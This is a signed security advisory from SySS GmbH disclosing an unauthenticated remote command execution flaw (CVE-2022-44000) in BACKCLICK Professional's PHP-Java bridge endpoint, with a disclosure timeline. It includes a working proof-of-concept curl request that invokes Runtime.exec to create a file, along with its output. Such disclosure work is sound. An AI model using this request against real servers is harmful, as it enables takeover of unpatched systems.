-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2022-032
Product:                   BACKCLICK
Manufacturer:              BACKCLICK GmbH
Tested Version(s):         BACKCLICK Professional 5.9.63 (On-Premises)
Vulnerability Type:        CWE-913: Improper Control of Dynamically-Managed Code Resources
                           CWE-306: Missing Authentication for Critical Function
Risk Level:                High
Solution Status:           Unknown
Manufacturer Notification: 2022-05-25
Public Disclosure:         2022-11-14
CVE Reference:             CVE-2022-44000
Author of Advisory:        Moritz Bechler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

BACKCLICK is a web application used for e-mail marketing and the
creation of newsletters.

The German manufacturer describes the product as follows (see [1]):

"BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und
Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter
erstellen und an Ihre Kunden versenden können."

Due to an exposed internal communications interface, it is possible 
to execute arbitrary system commands on the server.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

A part of the management application is implemented in PHP, which is run
in separate FastCGI processes. A bridge facilitates communication 
between the PHP and Java code. The PHP to Java interface uses an 
HTTP protocol endpoint at /bc/*.phpjavabridge which accepts an XML-based
request format allowing low-level interaction with Java objects.

That interface allows direct invocation of Java methods, e.g. 
java.lang.Runtime.getRuntime().exec(X), and thereby execution of system
commands in the context of the application server.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

A suitable request can be constructed and submitted with curl:

- -----
> curl -v -i -s -k -X $'PUT' 
   --data-binary $'\x7f{
   <C value=\"java.lang.Runtime\" predicate=\"C\"></C>
   <I value=\"1\" method=\"getRuntime\" predicate=\"I\"></I>
   <I value=\"2\" method=\"exec\" predicate=\"I\">
   <String value=\"touch /tmp/php-rce\" /></I>'     
    $'https://externalhost/bc/servlet/servlet.phpjavabridge'

[...]

<O v="1" m="java.lang.Runtime" p="O" n="F"/>
<O v="2" m="java.lang.Runtime" p="O" n="F"/>
<O v="3" m="java.lang.UNIXProcess" p="O" n="T"/
- -----

The execution and created file can be observed on the BACKCLICK server.
The created file is owned by the Tomcat user.

- -----
> ls -la /tmp/systemd-private-[...]-tomcat9.service-EW826i/tmp/php-rce 
- -rw-r----- 1 tomcat tomcat 0 Mär 17 14:19 /tmp/systemd-private-[...]-tomcat9.service-EW826i/tmp/php-rce
- -----


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Contact vendor for solution.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-05-25: Vulnerabilities reported to manufacturer
2022-06-28: Advisories provided again, as originals were not received
2022-07-20: Confirmation, inquiry regarding reproduction of one issue
2022-11-14: No more information received, public disclosure of vulnerabilities

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for BACKCLICK
    https://www.backclick.de/
[2] SySS Security Advisory SYSS-2022-032
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-032.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Bechler of SySS GmbH.

E-Mail: moritz.bechler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc
Key ID: 0x768EFE2BB3E53DDA
Key Fingerprint: 2C8F F101 9D77 BDE6 465E  CCC2 768E FE2B B3E5 3DDA

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT8ACgkQdo7+K7Pl
Pdr9wggAgJhwDe73i39znBu9RdOCnCPXQJLXmw5f6maSPhothYCJ6en+tRUZGDdD
SfedURYFLcy7BPp1KO1eMUdVuvriK3m5Cqp1eYugyhNsruzHiG1LfQ3uA8jNyg+G
30PWxY/q5WoOt3tsHTKNLJZbQTPSALdRaECOwsiBc5vAYGG7AasO2YRFjYsSzkQc
4hgpYlHuuqGXuKodwo/jvr//mNzRpsgfZS3gc1YbSLTTbfxWyO+x3VkOCOJ3jIQY
3BX6EzNyqzf86QV3jmA2AIWEUVQx6NWlDNlbiR9atusDirt3O+hXfcSTpRYwNGLk
+fP7SQHkgdJXx+u1Blv4Uhs3F7gfeA==
=Zy4q
-----END PGP SIGNATURE-----